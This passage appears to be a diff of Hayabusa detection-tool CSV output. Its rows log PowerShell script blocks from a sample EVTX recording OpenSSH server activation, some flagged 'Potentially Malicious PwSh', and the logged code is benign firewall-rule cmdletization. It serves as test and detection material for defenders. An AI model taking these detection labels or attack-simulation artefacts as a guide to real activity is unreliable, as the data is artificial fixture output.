= $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 